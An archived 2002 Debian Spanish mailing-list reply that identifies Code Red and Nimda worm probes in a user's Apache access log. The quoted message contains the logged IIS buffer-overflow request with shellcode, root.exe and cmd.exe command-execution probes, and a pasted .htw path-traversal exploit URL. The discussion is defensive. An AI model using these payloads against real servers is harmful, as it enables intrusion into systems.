Re: [Posible OT]Mas apache

To: debian-user-spanish@lists.debian.org
Subject: Re: [Posible OT]Mas apache
From: Roberto Castellor Morant <borzung@softhome.net>
Date: Fri, 10 May 2002 17:33:47 +0200
Message-id: <[🔎] 20020510153347.GA739@borzung.serveftp.com>
In-reply-to: <[🔎] 200205101506.g4AF66s17679@smtp.supercable.es>
References: <[🔎] 200205101506.g4AF66s17679@smtp.supercable.es>

Hola
bienvenido al mundo de los gusanos, son dos distintos los que te estan
"atacando" el nimda y el red code, sin duda esto se debe al nivel que
tienen los administradores de IIS despues de 2 años aun seguimos
teniendo estos problemitas, por lo demas apache no esta afectado por
ninguno de estos dos.

Saludos, Roberto

On Fri, May 10, 2002 at 05:11:26PM +0200, Aitor wrote:
> Hola a todos: 
> Tengo el apache 1.3.24 instalado desde hace poco (para probarlo) y ayer 
> mirando el acces.log me encontre con esto:
> 218.25.47.223 - - [09/May/2002:01:31:06 +0200] "GET 
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%uc
> bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 
> 400 331 "-" "-"
> 
> y con esto:
> 
> 217.216.124.199 - - [09/May/2002:15:26:26 +0200] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
> 217.216.124.199 - - [09/May/2002:15:26:29 +0200] "GET /MSADC/root.exe?/c+dir 
> HTTP/1.0" 404 287 "-" "-"
> 217.216.124.199 - - [09/May/2002:15:26:36 +0200] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
> 
> Buscando exploits y eso me encontre con este (aunque solo es de IIS):
> 
> http://ip/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiwebhitsFile=/../..
> /./..test.txt&CiRestriction=none&CiHiliteType=Full
> 
> Que mas o menos se parece la pregunta es: ¿Alguien esta intentado algo 
> raro?¿o es mejor que deje las bebidas de alta graduacion:-)?
> Si alguien me pudiera aclarar esto ya digo que tengo el server desde hace 
> poco y lo puse para probar
> 
> Gracias y perdonad por el posible [OT] y por lo largo del texto :-)
> -- 
> ____________________________________
> *         				              *
> *   web personal: http://go.to/nuestra.web     *
> *   Linux user #255925			  *
> *   Debian/GNU			              *
> *    Kernel 2.2.18			              *
> *___________________________________*
> 
> 
> -- 
> To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
> 


-- 
To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Reply to:

Follow-Ups:
- Re: [Posible OT]Mas apache
  - From: Aitor <aitormo@supercable.es>

References:
- [Posible OT]Mas apache
  - From: Aitor <aitormo@supercable.es>

Prev by Date: [Posible OT]Mas apache
Next by Date: Re: procmail'ear mensajes recibidos
Previous by thread: [Posible OT]Mas apache
Next by thread: Re: [Posible OT]Mas apache
Index(es):
- Date
- Thread